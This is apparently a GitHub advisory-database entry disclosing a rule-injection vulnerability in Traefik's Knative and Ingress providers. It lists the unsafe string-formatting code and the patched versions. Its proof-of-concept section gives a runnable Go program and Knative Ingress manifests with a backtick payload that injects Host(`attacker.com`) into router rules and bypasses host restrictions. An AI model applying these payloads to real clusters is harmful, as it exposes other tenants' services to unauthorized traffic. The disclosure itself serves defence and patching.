+ "details": "## Summary\n\nThere is a potential vulnerability in Traefik's Kubernetes Knative, Ingress, and Ingress-NGINX providers related to rule injection.\n\nUser-controlled values are interpolated into backtick-delimited Traefik router rule expressions without escaping or validation. A malicious value containing a backtick can terminate the literal and inject additional operators into Traefik's rule language, altering the parsed rule tree. In shared or multi-tenant deployments, this can bypass host and header routing constraints and redirect unauthorized traffic to victim services.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n<details>\n<summary>Original Description</summary>\n\n### Summary\nTraefik's Knative provider builds router rules by interpolating user-controlled values into backtick-delimited rule expressions without escaping. In live cluster validation, Knative `rules[].hosts[]` was exploitable for host restriction bypass (for example `tenant.example.com`) || Host(`attacker.com`), producing a router that serves attacker-controlled hosts. Knative `headers[].exact` also allows rule-syntax injection and proves unsafe rule construction. In multi-tenant clusters, this can route unauthorized traffic to victim services and lead to cross-tenant traffic exposure. Severity is High in shared deployments.\n\nTested on Traefik `v3.6.10`; the vulnerable pattern appears to have been present since the Knative provider was introduced. Earlier versions with Knative provider support are expected to be affected.\n\n### Details\nThe issue is caused by unsafe rule-string construction using `fmt.Sprintf` with backtick-delimited literals.\n\nIncriminated code patterns:\n\n- `pkg/provider/kubernetes/knative/kubernetes.go`\n - `fmt.Sprintf(\"Host(`%v`)\", host)`\n - `fmt.Sprintf(\"Header(`%s`,`%s`)\", key, headers[key].Exact)`\n - `fmt.Sprintf(\"PathPrefix(`%s`)\", path)`\n\n- `pkg/provider/kubernetes/ingress/kubernetes.go`\n - `fmt.Sprintf(\"Host(`%s`)\", host)`\n - `fmt.Sprintf(\"(Path(`%[1]s`) || PathPrefix(`%[1]s/`))\", path)`\n\n- `pkg/provider/kubernetes/ingress-nginx/kubernetes.go` (hardening candidate; not the primary confirmed vector in this report)\n - `fmt.Sprintf(\"Header(`%s`, `%s`)\", c.Header, c.HeaderValue)`\n - related host/path/header concatenations with backticks\n\nBecause inputs are inserted directly into rule expressions, a malicious value containing a backtick can terminate the literal and inject additional operators/tokens in Traefik's rule language. Example payload:\n\n- `x`) || Host(`attacker.com`\n\nWhen used as a header value in Knative rule construction, the resulting rule contains:\n\n- `Header(`X-Poc`,`x`) || Host(`attacker.com`)`\n\nThis alters rule semantics and enables injection into Traefik's rule language. Depending on the field used (`hosts[]` vs `headers[].exact`) this can become a direct routing bypass.\n\nImportant scope note:\n\n- Gateway API code path (`pkg/provider/kubernetes/gateway/httproute.go`) already uses safer `%q` formatting for header/query rules and is not affected by this exact pattern.\n- For standard Kubernetes Ingress, `spec.rules.host` is validated as DNS-1123 by the API server, which rejects backticks (so this specific host-injection payload is typically blocked).\n- For Knative Ingress, `rules[].hosts[]` and `headers[].exact` are typed as `string` in CRD schema with no pattern constraint.\n- In this validation environment, `rules[].hosts[]` was accepted and produced a practical host bypass. `headers[].exact` was also accepted and produced rule-syntax injection in generated routers.\n- Ingress-NGINX patterns are included as follow-up hardening targets and are not claimed as independently exploitable here.\n- Exploitability depends on admission/validation policy and who can create these resources.\n\n### PoC\n\n1. Local deterministic PoC (no cluster required):\n\n- Run:\n - Save the inline PoC below as `poc_build_rule.go`\n - Run `go run poc_build_rule.go`\n- Observe output:\n - Legitimate rule: `(Host(`tenant.example.com`)) && (Header(`X-API-Key`,`secret123`)) && PathPrefix(`/`)`\n - Malicious rule: `(Host(`tenant.example.com`)) && (Header(`X-API-Key`,`x`) || Host(`attacker.com`)) && PathPrefix(`/`)`\n- This proves syntax injection in current string-construction logic.\n\nInline PoC code (self-contained):\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"sort\"\n\t\"strings\"\n)\n\nfunc buildRuleKnative(hosts []string, headers map[string]struct{ Exact string }, path string) string {\n\tvar operands []string\n\n\tif len(hosts) > 0 {\n\t\tvar hostRules []string\n\t\tfor _, host := range hosts {\n\t\t\thostRules = append(hostRules, fmt.Sprintf(\"Host(`%v`)\", host))\n\t\t}\n\t\toperands = append(operands, fmt.Sprintf(\"(%s)\", strings.Join(hostRules, \" || \")))\n\t}\n\n\tif len(headers) > 0 {\n\t\theaderKeys := make([]string, 0, len(headers))\n\t\tfor k := range headers {\n\t\t\theaderKeys = append(headerKeys, k)\n\t\t}\n\t\tsort.Strings(headerKeys)\n\n\t\tvar headerRules []string\n\t\tfor _, key := range headerKeys {\n\t\t\theaderRules = append(headerRules, fmt.Sprintf(\"Header(`%s`,`%s`)\", key, headers[key].Exact))\n\t\t}\n\t\toperands = append(operands, fmt.Sprintf(\"(%s)\", strings.Join(headerRules, \" && \")))\n\t}\n\n\tif len(path) > 0 {\n\t\toperands = append(operands, fmt.Sprintf(\"PathPrefix(`%s`)\", path))\n\t}\n\n\treturn strings.Join(operands, \" && \")\n}\n\nfunc main() {\n\tlegitHeaders := map[string]struct{ Exact string }{\n\t\t\"X-API-Key\": {Exact: \"secret123\"},\n\t}\n\tfmt.Println(buildRuleKnative([]string{\"tenant.example.com\"}, legitHeaders, \"/\"))\n\n\tmaliciousHeaders := map[string]struct{ Exact string }{\n\t\t\"X-API-Key\": {Exact: \"x`) || Host(`attacker.com\"},\n\t}\n\tfmt.Println(buildRuleKnative([]string{\"tenant.example.com\"}, maliciousHeaders, \"/\"))\n\n\t// Safe variant example (Gateway-style):\n\tfmt.Println(fmt.Sprintf(\"Header(%q,%q)\", \"X-API-Key\", \"x`) || Host(`attacker.com\"))\n}\n```\n\n2. Cluster PoC (Knative host injection, primary / practical bypass):\n\n- Preconditions:\n - Kubernetes test cluster with Knative Serving.\n - Traefik configured with Knative provider.\n- Apply manifest:\n - `kubectl apply -f - <<'YAML'`\n```yaml\napiVersion: networking.internal.knative.dev/v1alpha1\nkind: Ingress\nmetadata:\n name: poc-host-injection\n namespace: default\n annotations:\n # This exact key worked in live validation:\n networking.knative.dev/ingress.class: \"traefik.ingress.networking.knative.dev\"\nspec:\n rules:\n - hosts:\n - 'tenant.example.com`) || Host(`attacker.com'\n visibility: External\n http:\n paths:\n - path: \"/\"\n splits:\n - percent: 100\n serviceName: dummy\n serviceNamespace: default\n servicePort: 80\nYAML\n```\n - (If API version mismatch, adjust between `networking.internal.knative.dev/v1alpha1` and `networking.knative.dev/v1alpha1`.)\n- Verify:\n - Check Traefik router rule contains: `(Host(`tenant.example.com`) || Host(`attacker.com`)) && PathPrefix(`/`)`.\n - Request with `Host: attacker.com` returns backend 200.\n - This demonstrates host restriction bypass in practice.\n\n3. Cluster PoC (Knative header injection, confirms rule-syntax injection):\n\n- Apply:\n - `kubectl apply -f - <<'YAML'`\n```yaml\napiVersion: networking.internal.knative.dev/v1alpha1\nkind: Ingress\nmetadata:\n name: poc-rule-injection\n namespace: default\n annotations:\n networking.knative.dev/ingress.class: \"traefik.ingress.networking.knative.dev\"\nspec:\n rules:\n - hosts:\n - \"tenant.example.com\"\n visibility: External\n http:\n paths:\n - path: \"/\"\n headers:\n X-Poc:\n exact: 'x`) || Host(`attacker.com'\n splits:\n - percent: 100\n serviceName: dummy\n serviceNamespace: default\n servicePort: 80\nYAML\n```\n- Verify:\n - Inspect generated Traefik dynamic router rule (API/dashboard/logs).\n - Confirm injected fragment `|| Host(`attacker.com`)` is present.\n - Send request with `Host: attacker.com` and no expected tenant header (expected: 404 for this payload shape, because leading `Host(tenant)` still applies).\n - Send request with `Host: tenant.example.com` and `X-Poc: x` (expected: 200 from backend).\n\n4. Optional Ingress PoC (scope check):\n\n- Apply:\n - `kubectl apply -f - <<'YAML'`\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: poc-ingress-host-injection\n namespace: default\n annotations:\n kubernetes.io/ingress.class: traefik\nspec:\n rules:\n - host: 'tenant.example.com`) || Host(`attacker.com'\n http:\n paths:\n - path: /\n pathType: Prefix\n backend:\n service:\n name: dummy\n port:\n number: 80\nYAML\n```\n- Expected in most clusters: API server rejects this payload because Ingress `host` must satisfy DNS-1123.\n- Keep this step only as a negative control to demonstrate the distinction between native Ingress validation and Knative CRD behavior.\n\nValidation executed in this report:\n\n- Local deterministic PoC executed with `go run` and output matched expected injected rule.\n- Live cluster test executed on local `kind` cluster (`kind-traefik-poc`) with Traefik `v3.6.10` and Knative Serving CRDs.\n- Annotation key confirmed in this environment: `networking.knative.dev/ingress.class` (dot). The hyphen variant was not used by the successful processing path.\n- Traefik API/logs confirmed generated routers included injected expressions.\n- Live HTTP request with `Host: attacker.com` reached backend (`200`) for Knative host-injection payload.\n\n### Impact\n- **Vulnerability type:** Rule injection / authorization bypass at routing layer.\n- **Primary impact:** Bypass of intended routing predicates (host/header/path), enabling unauthorized routing to protected services.\n- **Who is impacted:** Primarily deployments using Traefik Knative provider where untrusted or semi-trusted actors can create/update Knative Ingress resources (typical in multi-tenant clusters, shared namespaces, or weak admission controls). Standard Kubernetes Ingress host injection is usually blocked by API validation.\n- **Security consequences:** Cross-tenant traffic access, internal service exposure, policy bypass, and potential chaining with app-level vulnerabilities.\n\n</details>",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments